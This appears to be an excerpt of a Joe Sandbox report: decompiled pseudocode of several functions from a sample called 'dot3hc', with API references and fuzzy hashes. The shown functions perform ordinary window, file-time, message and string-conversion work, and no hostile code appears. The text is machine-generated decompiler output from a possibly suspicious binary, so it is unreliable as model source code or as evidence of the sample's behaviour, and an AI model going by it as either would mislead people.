                                                      									 *((intOrPtr*)( *_t84 + 8))(_t84);
                                                      									_t86 = _v20;
                                                      									__eflags = _t86;
                                                      									if(_t86 != 0) {
                                                      										_t150 = _t154 + 8;
                                                      										_v12 =  *((intOrPtr*)( *_t86))(_t86, 0x439320, _t150);
                                                      										_t88 = _v20;
                                                      										 *((intOrPtr*)( *_t88 + 8))(_t88);
                                                      										_t81 = _v12;
                                                      										__eflags = _t81;
                                                      										if(__eflags >= 0) {
                                                      											_t151 =  *_t150;
                                                      											 *( *_t151)(_t151, 0x439310, _t154 + 0xc);
                                                      											goto L21;
                                                      										}
                                                      									} else {
                                                      										_t81 = 0x80004005;
                                                      									}
                                                      								}
                                                      							} else {
                                                      								_t99 =  *_t148;
                                                      								_t151 = _t154 + 0x4c;
                                                      								_t100 =  *((intOrPtr*)( *_t99 + 0xc))(_t99, 0, 0x4395b0, _t151);
                                                      								__eflags =  *_t151;
                                                      								_v12 = _t100;
                                                      								if( *_t151 == 0) {
                                                      									_v12 = 0x80004003;
                                                      								}
                                                      								__eflags = _v12;
                                                      								if(__eflags >= 0) {
                                                      									L21:
                                                      									_t92 = E0041733F(0, _t154, _t151, _t154, __eflags);
                                                      									__eflags = _v24;
                                                      									_t156 = _t92;
                                                      									if(_v24 != 0) {
                                                      										__eflags = _v40.right - _v40.left;
                                                      										E0040CA11(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
                                                      										E0040CA4F(_v8, 0);
                                                      									}
                                                      									_t81 = _t156;
                                                      								} else {
                                                      									__eflags = _v24;
                                                      									if(_v24 != 0) {
                                                      										__eflags = _v40.right - _v40.left;
                                                      										E0040CA11(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
                                                      										E0040CA4F(_v8, 0);
                                                      									}
                                                      									_t81 = _v12;
                                                      								}
                                                      							}
                                                      							return _t81;
                                                      						}
                                                      					}
                                                      				} else {
                                                      					L4:
                                                      					_push(_t158);
                                                      					_push(_t126);
                                                      					_t2 =  &_v76; // 0x4423e8
                                                      					_v76 = 0x442480;
                                                      					E0041F7F4(_t2, 0x43c590);
                                                      					asm("int3");
                                                      					_push(4);
                                                      					E0041F6EA(E00431BFC, 0, _t147, _t154);
                                                      					_t127 = E0040F014(0x104);
                                                      					_v88 = _t127;
                                                      					_t70 = 0;
                                                      					_v76 = 0;
                                                      					if(_t127 != 0) {
                                                      						_t70 = E0040D519(_t127);
                                                      					}
                                                      					return E0041F7C2(_t70);
                                                      				}
                                                      			}

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Window$Rect$DesktopVisible
                                                      • String ID:
                                                      • API String ID: 1055025324-0
                                                      • Opcode ID: 9fd2e131ecfaca2e4f596605befef15e013afeb60e8cd7df608e467907c7161e
                                                      • Instruction ID: 8e4b7480244538acadc42369d4a2fea37553eaefd090f2d635b64ddf38e68156
                                                      • Opcode Fuzzy Hash: 9fd2e131ecfaca2e4f596605befef15e013afeb60e8cd7df608e467907c7161e
                                                      • Instruction Fuzzy Hash: 3651D975A0020AEFCB00DFE8C984DAEBBB9FF48344B2445A9F505E7251CB35AD41CB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0041B2DE(void* __ecx, void* __eflags, signed int* _a4) {
                                                      				char _v12;
                                                      				struct _FILETIME _v20;
                                                      				struct _FILETIME _v28;
                                                      				char _v36;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				void* _t52;
                                                      				long _t56;
                                                      				signed int* _t75;
                                                      				signed int* _t78;
                                                      				signed int* _t81;
                                                      				struct _FILETIME* _t88;
                                                      				void* _t100;
                                                      				CHAR* _t101;
                                                      				signed int* _t102;
                                                      				void* _t103;
                                                      				void* _t107;
                                                      
                                                      				_t85 = __ecx;
                                                      				_t102 = _a4;
                                                      				_t100 = __ecx;
                                                      				E0041F330(__ecx, _t102, 0, 0x128);
                                                      				E00402FE8(0, _t85, _t100, _t102, _t103,  &(_t102[8]), 0x104,  *(_t100 + 0xc), 0xffffffff);
                                                      				_t52 =  *(_t100 + 4);
                                                      				_t107 = _t52 -  *0x43664c; // 0xffffffff
                                                      				if(_t107 == 0) {
                                                      					L21:
                                                      					return 1;
                                                      				}
                                                      				_t88 =  &_v12;
                                                      				if(GetFileTime(_t52, _t88,  &_v20,  &_v28) != 0) {
                                                      					_t56 = GetFileSize( *(_t100 + 4), 0);
                                                      					_t102[6] = _t56;
                                                      					_t102[7] = 0;
                                                      					if(_t56 != 0xffffffff || 0 != 0) {
                                                      						_t101 =  *(_t100 + 0xc);
                                                      						if( *((intOrPtr*)(_t101 - 0xc)) != 0) {
                                                      							_t102[8] = (_t88 & 0xffffff00 | GetFileAttributesA(_t101) == 0xffffffff) - 0x00000001 & _t57;
                                                      						} else {
                                                      							_t102[8] = 0;
                                                      						}
                                                      						if(E0041B166( &_v12) == 0) {
                                                      							 *_t102 = 0;
                                                      							_t102[1] = 0;
                                                      						} else {
                                                      							_t81 = E0041B280( &_v36,  &_v12, 0xffffffff);
                                                      							 *_t102 =  *_t81;
                                                      							_t102[1] = _t81[1];
                                                      						}
                                                      						if(E0041B166( &_v20) == 0) {
                                                      							_t102[4] = 0;
                                                      							_t102[5] = 0;
                                                      						} else {
                                                      							_t78 = E0041B280( &_v36,  &_v20, 0xffffffff);
                                                      							_t102[4] =  *_t78;
                                                      							_t102[5] = _t78[1];
                                                      						}
                                                      						if(E0041B166( &_v28) == 0) {
                                                      							_t102[2] = 0;
                                                      							_t102[3] = 0;
                                                      						} else {
                                                      							_t75 = E0041B280( &_v36,  &_v28, 0xffffffff);
                                                      							_t102[2] =  *_t75;
                                                      							_t102[3] = _t75[1];
                                                      						}
                                                      						if(( *_t102 | _t102[1]) == 0) {
                                                      							 *_t102 = _t102[2];
                                                      							_t102[1] = _t102[3];
                                                      						}
                                                      						if((_t102[4] | _t102[5]) == 0) {
                                                      							_t102[4] = _t102[2];
                                                      							_t102[5] = _t102[3];
                                                      						}
                                                      						goto L21;
                                                      					} else {
                                                      						goto L2;
                                                      					}
                                                      				}
                                                      				L2:
                                                      				return 0;
                                                      			}


                                                      APIs
                                                      • _memset.LIBCMT ref: 0041B2F5
                                                        • Part of subcall function 00402FE8: _wctomb_s.LIBCMT ref: 00402FF8
                                                      • GetFileTime.KERNEL32(?,?,?,?), ref: 0041B32C
                                                      • GetFileSize.KERNEL32(?,00000000), ref: 0041B341
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: File$SizeTime_memset_wctomb_s
                                                      • String ID:
                                                      • API String ID: 26245289-0
                                                      • Opcode ID: 460687b828287e484770bf3ac6ef00e5158413d383cc5e2fa65d22da16e9dfdf
                                                      • Instruction ID: ab47600a3e4a610a652e78fe131df308bb0f6e3dfc8c5e458132c93997bab673
                                                      • Opcode Fuzzy Hash: 460687b828287e484770bf3ac6ef00e5158413d383cc5e2fa65d22da16e9dfdf
                                                      • Instruction Fuzzy Hash: BF413E715007099FCB24DF65C9858EBB7F8FF083507108A2EE5A6D3690E734E984CB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E0040CE23(void* __ecx, struct HWND__** _a4) {
                                                      				struct HWND__** _v8;
                                                      				struct HWND__** _v12;
                                                      				long _t31;
                                                      				struct HWND__** _t32;
                                                      				struct HWND__** _t44;
                                                      				struct HWND__** _t45;
                                                      				long _t47;
                                                      				void* _t49;
                                                      				struct HWND__** _t63;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_t49 = __ecx;
                                                      				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
                                                      					_t31 = _a4;
                                                      					if(_t31 != 0) {
                                                      						if( *((intOrPtr*)(_t31 + 8)) == 0) {
                                                      							L4:
                                                      							_t32 = E0041A1B3( *((intOrPtr*)(_t49 + 0x4c)) + 0x40, _t31, 0);
                                                      							_v12 = _t32;
                                                      							_a4 = _t32;
                                                      							E00406B97( &_a4);
                                                      							while(_a4 != 0) {
                                                      								_t37 =  *((intOrPtr*)(E00406B97( &_a4)));
                                                      								_v8 =  *((intOrPtr*)(E00406B97( &_a4)));
                                                      								if((E0040CB3B(_t37) & 0x00020000) != 0) {
                                                      									break;
                                                      								} else {
                                                      									_t45 = _v8;
                                                      									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
                                                      										continue;
                                                      									} else {
                                                      										L16:
                                                      										_t44 = _v8;
                                                      										goto L17;
                                                      									}
                                                      								}
                                                      								goto L18;
                                                      							}
                                                      							_a4 = _v12;
                                                      							_t31 = E0040CC2A( &_a4);
                                                      							while(_a4 != 0) {
                                                      								_t63 =  *(E0040CC2A( &_a4));
                                                      								_v8 = _t63;
                                                      								if(_t63[2] == 0) {
                                                      									L13:
                                                      									_t31 = E0040CB3B(_t63);
                                                      									if((_t31 & 0x00020000) == 0) {
                                                      										continue;
                                                      									}
                                                      								} else {
                                                      									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
                                                      										goto L16;
                                                      									} else {
                                                      										_t63 = _v8;
                                                      										goto L13;
                                                      									}
                                                      								}
                                                      								goto L18;
                                                      							}
                                                      						} else {
                                                      							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
                                                      							_t44 = _a4;
                                                      							if(_t47 == 1) {
                                                      								L17:
                                                      								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
                                                      							} else {
                                                      								goto L4;
                                                      							}
                                                      						}
                                                      						L18:
                                                      					}
                                                      				}
                                                      				return _t31;
                                                      			}


                                                      APIs
                                                      • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 0040CE57
                                                      • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 0040CEBC
                                                      • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 0040CF01
                                                      • SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 0040CF2A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 98a5e719becc5e9530cc4bbf65561d4dc1d48f7fc4dbf92ba7db1ce7141c8203
                                                      • Instruction ID: 66e3d6775930df425968a4b0a54b9f9d1576368976f6134ca70a6ff43a027803
                                                      • Opcode Fuzzy Hash: 98a5e719becc5e9530cc4bbf65561d4dc1d48f7fc4dbf92ba7db1ce7141c8203
                                                      • Instruction Fuzzy Hash: A2319070500115FBDB24DF51C8C5EAE7BA9EF41390F10817BF905AB291DA38AD40DBA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0042CE52(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				char _v8;
                                                      				signed int _v12;
                                                      				char _v20;
                                                      				char _t43;
                                                      				char _t46;
                                                      				signed int _t53;
                                                      				signed int _t54;
                                                      				intOrPtr _t56;
                                                      				intOrPtr _t57;
                                                      				int _t58;
                                                      				signed short* _t59;
                                                      				short* _t60;
                                                      				int _t65;
                                                      				char* _t72;
                                                      
                                                      				_t72 = _a8;
                                                      				if(_t72 == 0 || _a12 == 0) {
                                                      					L5:
                                                      					return 0;
                                                      				} else {
                                                      					if( *_t72 != 0) {
                                                      						E0041E998( &_v20, __edi, _a16);
                                                      						_t43 = _v20;
                                                      						__eflags =  *(_t43 + 0x14);
                                                      						if( *(_t43 + 0x14) != 0) {
                                                      							_t46 = E00425DF3( *_t72 & 0x000000ff,  &_v20);
                                                      							__eflags = _t46;
                                                      							if(_t46 == 0) {
                                                      								__eflags = _a4;
                                                      								_t40 = _v20 + 4; // 0x840ffff8
                                                      								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                      								if(__eflags != 0) {
                                                      									L10:
                                                      									__eflags = _v8;
                                                      									if(_v8 != 0) {
                                                      										_t53 = _v12;
                                                      										_t11 = _t53 + 0x70;
                                                      										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                      										__eflags =  *_t11;
                                                      									}
                                                      									return 1;
                                                      								}
                                                      								L21:
                                                      								_t54 = E0041F8D2(__eflags);
                                                      								 *_t54 = 0x2a;
                                                      								__eflags = _v8;
                                                      								if(_v8 != 0) {
                                                      									_t54 = _v12;
                                                      									_t33 = _t54 + 0x70;
                                                      									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                      									__eflags =  *_t33;
                                                      								}
                                                      								return _t54 | 0xffffffff;
                                                      							}
                                                      							_t56 = _v20;
                                                      							_t15 = _t56 + 0xac; // 0xa045ff98
                                                      							_t65 =  *_t15;
                                                      							__eflags = _t65 - 1;
                                                      							if(_t65 <= 1) {
                                                      								L17:
                                                      								_t24 = _t56 + 0xac; // 0xa045ff98
                                                      								__eflags = _a12 -  *_t24;
                                                      								if(__eflags < 0) {
                                                      									goto L21;
                                                      								}
                                                      								__eflags = _t72[1];
                                                      								if(__eflags == 0) {
                                                      									goto L21;
                                                      								}
                                                      								L19:
                                                      								__eflags = _v8;
                                                      								_t27 = _t56 + 0xac; // 0xa045ff98
                                                      								_t57 =  *_t27;
                                                      								if(_v8 == 0) {
                                                      									return _t57;
                                                      								}
                                                      								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                      								return _t57;
                                                      							}
                                                      							__eflags = _a12 - _t65;
                                                      							if(_a12 < _t65) {
                                                      								goto L17;
                                                      							}
                                                      							__eflags = _a4;
                                                      							_t21 = _t56 + 4; // 0x840ffff8
                                                      							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                      							__eflags = _t58;
                                                      							_t56 = _v20;
                                                      							if(_t58 != 0) {
                                                      								goto L19;
                                                      							}
                                                      							goto L17;
                                                      						}
                                                      						_t59 = _a4;
                                                      						__eflags = _t59;
                                                      						if(_t59 != 0) {
                                                      							 *_t59 =  *_t72 & 0x000000ff;
                                                      						}
                                                      						goto L10;
                                                      					} else {
                                                      						_t60 = _a4;
                                                      						if(_t60 != 0) {
                                                      							 *_t60 = 0;
                                                      						}
                                                      						goto L5;
                                                      					}
                                                      				}
                                                      			}


















                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042CE82
                                                      • __isleadbyte_l.LIBCMT ref: 0042CEB6
                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000800,?,00000800,0042C711,?,?,00000002), ref: 0042CEE7
                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000800,?,00000800,0042C711,?,?,00000002), ref: 0042CF55
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      • Opcode ID: 3807aa945e28d61556327e1f51631c5f31dded84c93292a081c3416f1b4e28e9
                                                      • Instruction ID: 976c8db8c8d1bf3a5b4f198b380441d655359f927b8502cec911b7ca074ebcd7
                                                      • Opcode Fuzzy Hash: 3807aa945e28d61556327e1f51631c5f31dded84c93292a081c3416f1b4e28e9
                                                      • Instruction Fuzzy Hash: 7B31F431B10265EFDB20DFA4E8C09BE7BA5BF02310F9685AAF4609B291D334DD50DB59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 80%
                                                      			E00415210(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                      				intOrPtr _t51;
                                                      				void* _t53;
                                                      				intOrPtr _t68;
                                                      				intOrPtr _t69;
                                                      				intOrPtr _t70;
                                                      				intOrPtr* _t77;
                                                      				signed int _t80;
                                                      				void* _t82;
                                                      				void* _t83;
                                                      				intOrPtr* _t84;
                                                      
                                                      				_t83 = __eflags;
                                                      				_push(0x20);
                                                      				E0041F6EA(E00432E8C, __ebx, __edi, __esi);
                                                      				_t80 = 0;
                                                      				 *((intOrPtr*)(_t82 - 0x10)) = 0;
                                                      				 *((intOrPtr*)(_t82 - 0x14)) = 0x436aa8;
                                                      				_t68 =  *((intOrPtr*)(_t82 + 8));
                                                      				_t71 = _t82 - 0x1c;
                                                      				 *(_t82 - 4) = 0;
                                                      				E0040DBE0(_t82 - 0x1c, _t83,  *((intOrPtr*)(_t68 - 0xb0)));
                                                      				_t77 =  *((intOrPtr*)(_t82 + 0x14));
                                                      				_t84 = _t77;
                                                      				 *(_t82 - 4) = 1;
                                                      				_t85 = _t84 == 0;
                                                      				if(_t84 == 0) {
                                                      					E004037E3(_t68, _t71, _t77, 0, _t85);
                                                      				}
                                                      				 *_t77 = _t80;
                                                      				if( *((intOrPtr*)(_t68 - 8)) == _t80) {
                                                      					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t68 - 0xac)) + 0x20)) + 0x20)));
                                                      					_t51 = E0040E644(_t68, _t71, _t77, _t80, __eflags);
                                                      					__eflags = _t51 - _t80;
                                                      					 *((intOrPtr*)(_t68 - 8)) = _t51;
                                                      					if(_t51 == _t80) {
                                                      						goto L3;
                                                      					} else {
                                                      						__eflags =  *(_t82 + 0xc) - _t80;
                                                      						if( *(_t82 + 0xc) != _t80) {
                                                      							IntersectRect(_t82 - 0x2c, _t68 - 0x9c,  *(_t82 + 0xc));
                                                      						} else {
                                                      							asm("movsd");
                                                      							asm("movsd");
                                                      							asm("movsd");
                                                      							asm("movsd");
                                                      							_t77 =  *((intOrPtr*)(_t82 + 0x14));
                                                      							_t80 = 0;
                                                      						}
                                                      						E0040E903(_t82 - 0x14, _t77, _t82, CreateRectRgnIndirect(_t82 - 0x2c));
                                                      						E0040E410( *((intOrPtr*)(_t68 - 8)), _t82 - 0x14, 1);
                                                      						_t69 =  *((intOrPtr*)(_t68 - 8));
                                                      						__eflags = _t69 - _t80;
                                                      						if(_t69 != _t80) {
                                                      							_t70 =  *((intOrPtr*)(_t69 + 4));
                                                      						} else {
                                                      							_t70 = 0;
                                                      						}
                                                      						__eflags =  *((intOrPtr*)(_t82 - 0x18)) - _t80;
                                                      						 *_t77 = _t70;
                                                      						 *(_t82 - 4) = 0;
                                                      						if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
                                                      							_push( *((intOrPtr*)(_t82 - 0x1c)));
                                                      							_push(_t80);
                                                      							E0040D3B7();
                                                      						}
                                                      						 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
                                                      						 *((intOrPtr*)(_t82 - 0x14)) = 0x4361d8;
                                                      						E0040E956(_t82 - 0x14);
                                                      						_t53 = 0;
                                                      						__eflags = 0;
                                                      					}
                                                      				} else {
                                                      					L3:
                                                      					 *(_t82 - 4) = 0;
                                                      					if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
                                                      						_push( *((intOrPtr*)(_t82 - 0x1c)));
                                                      						_push(_t80);
                                                      						E0040D3B7();
                                                      					}
                                                      					 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
                                                      					 *((intOrPtr*)(_t82 - 0x14)) = 0x4361d8;
                                                      					E0040E956(_t82 - 0x14);
                                                      					_t53 = 0x80004005;
                                                      				}
                                                      				return E0041F7C2(_t53);
                                                      			}














                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00415217
                                                        • Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
                                                        • Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804
                                                      • GetDC.USER32(?), ref: 00415295
                                                      • IntersectRect.USER32 ref: 004152CF
                                                      • CreateRectRgnIndirect.GDI32(?), ref: 004152D9
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3Rect$CreateException@8IndirectIntersectThrow
                                                      • String ID:
                                                      • API String ID: 2872313494-0
                                                      • Opcode ID: 506e79158975ac838f48e3fec4624e35c69e0d7bb44190366a378939756601cf
                                                      • Instruction ID: 57a31d86cf499e8c3f284dac0a6a6315687b59808bb24555e4edea15a439fa37
                                                      • Opcode Fuzzy Hash: 506e79158975ac838f48e3fec4624e35c69e0d7bb44190366a378939756601cf
                                                      • Instruction Fuzzy Hash: 4B316071D0021ADFCF01DFA4C485ADEBB74AF58314F10846AE911BB191C7B85A85CFA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 76%
                                                      			E0041D8AF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                      				int _t34;
                                                      				intOrPtr* _t62;
                                                      				void* _t63;
                                                      				void* _t64;
                                                      
                                                      				_t64 = __eflags;
                                                      				_push(0x24);
                                                      				E0041F6EA(E004338B2, __ebx, __edi, __esi);
                                                      				_t62 =  *((intOrPtr*)(_t63 + 8)) + 0xffffffc0;
                                                      				E0040DBE0(_t63 - 0x14, _t64,  *((intOrPtr*)( *((intOrPtr*)(_t63 + 8)) - 0x24)));
                                                      				 *(_t63 - 4) = 0;
                                                      				if( *((intOrPtr*)(_t63 + 0x10)) <=  *((intOrPtr*)(_t62 + 0x3c))) {
                                                      					L8:
                                                      					__eflags =  *(_t62 + 0x30);
                                                      					if( *(_t62 + 0x30) == 0) {
                                                      						_t34 = PeekMessageA(_t63 - 0x30, 0, 0, 0, 2);
                                                      						__eflags = _t34;
                                                      						if(_t34 != 0) {
                                                      							 *((intOrPtr*)( *_t62 + 0x58))(_t63 - 0x30);
                                                      						}
                                                      						L14:
                                                      						 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
                                                      						if( *(_t63 - 0x10) != 0) {
                                                      							_push( *((intOrPtr*)(_t63 - 0x14)));
                                                      							_push(0);
                                                      							E0040D3B7();
                                                      						}
                                                      						L17:
                                                      						return E0041F7C2(1);
                                                      					}
                                                      					L9:
                                                      					 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
                                                      					__eflags =  *(_t63 - 0x10);
                                                      					if( *(_t63 - 0x10) != 0) {
                                                      						_push( *((intOrPtr*)(_t63 - 0x14)));
                                                      						_push(0);
                                                      						E0040D3B7();
                                                      					}
                                                      					_push(2);
                                                      					_pop(1);
                                                      					goto L17;
                                                      				}
                                                      				if( *(_t62 + 0x30) != 0) {
                                                      					goto L9;
                                                      				}
                                                      				_push(_t63 - 0x30);
                                                      				if( *((intOrPtr*)( *_t62 + 0x5c))() == 0 ||  *((intOrPtr*)(_t62 + 0x2c)) == 0) {
                                                      					goto L8;
                                                      				} else {
                                                      					 *(_t62 + 0x30) = 1;
                                                      					do {
                                                      					} while (PeekMessageA(_t63 - 0x30, 0, 0x200, 0x209, 3) != 0);
                                                      					do {
                                                      					} while (PeekMessageA(_t63 - 0x30, 0, 0x100, 0x109, 3) != 0);
                                                      					 *((intOrPtr*)( *_t62 + 0x64))( *((intOrPtr*)(_t63 + 0xc)));
                                                      					 *(_t62 + 0x30) = 0;
                                                      					goto L14;
                                                      				}
                                                      			}








                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: MessagePeek$H_prolog3
                                                      • String ID:
                                                      • API String ID: 3998274959-0
                                                      • Opcode ID: f2860d6ab98e288d2f9796487f0e940f05db750c7d82c61cd7a5e65f63dd04ff
                                                      • Instruction ID: 1d58d31dcb184bdaff623e44cde678fc4dd054cac071c02b76d39c172b6b99e5
                                                      • Opcode Fuzzy Hash: f2860d6ab98e288d2f9796487f0e940f05db750c7d82c61cd7a5e65f63dd04ff
                                                      • Instruction Fuzzy Hash: 323171F1A10309ABDB209FA0DD85EAE77B8BF04714F00062EB552A62D1D778AA40CB18
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 20%
                                                      			E00411917(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __esi, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                      				signed int _v8;
                                                      				signed char _v264;
                                                      				void* __edi;
                                                      				signed int _t11;
                                                      				signed int _t14;
                                                      				void* _t16;
                                                      				char _t19;
                                                      				signed int _t22;
                                                      				intOrPtr _t23;
                                                      				signed int* _t34;
                                                      				CHAR* _t36;
                                                      				signed int _t37;
                                                      
                                                      				_t35 = __esi;
                                                      				_t26 = __ebx;
                                                      				_t11 =  *0x443590; // 0x8ffedb05
                                                      				_v8 = _t11 ^ _t37;
                                                      				_t34 = _a8;
                                                      				_push(0x100);
                                                      				_t33 =  &_v264;
                                                      				_push( &_v264);
                                                      				_push(_a4);
                                                      				_t14 =  *((intOrPtr*)( *__ecx + 0x7c))();
                                                      				if(_t14 != 0) {
                                                      					_push(__ebx);
                                                      					_push(__esi);
                                                      					_t36 =  &_v264;
                                                      					_t16 = E004223D4(_v264 & 0x000000ff);
                                                      					while(_t16 != 0) {
                                                      						_t36 = CharNextA(_t36);
                                                      						_t16 = E004223D4( *_t36 & 0x000000ff);
                                                      					}
                                                      					_t19 =  *_t36;
                                                      					if(_t19 == 0x2b || _t19 == 0x2d) {
                                                      						_t36 = CharNextA(_t36);
                                                      					}
                                                      					_t22 = E00422304( *_t36 & 0x000000ff);
                                                      					_pop(_t35);
                                                      					_pop(_t26);
                                                      					if(_t34 != 0) {
                                                      						 *_t34 = _t22;
                                                      					}
                                                      					if(_t22 == 0) {
                                                      						L3:
                                                      						_t23 = 0;
                                                      						goto L17;
                                                      					} else {
                                                      						_push(0xa);
                                                      						_push(0);
                                                      						_push( &_v264);
                                                      						if(_a12 == 0) {
                                                      							_t23 = E00422215();
                                                      						} else {
                                                      							_t23 = E004221EC();
                                                      						}
                                                      						L17:
                                                      						return E0041E5DF(_t23, _t26, _v8 ^ _t37, _t33, _t34, _t35);
                                                      					}
                                                      				}
                                                      				if(_t34 != 0) {
                                                      					 *_t34 =  *_t34 & _t14;
                                                      				}
                                                      				goto L3;
                                                      			}
















                                                      APIs
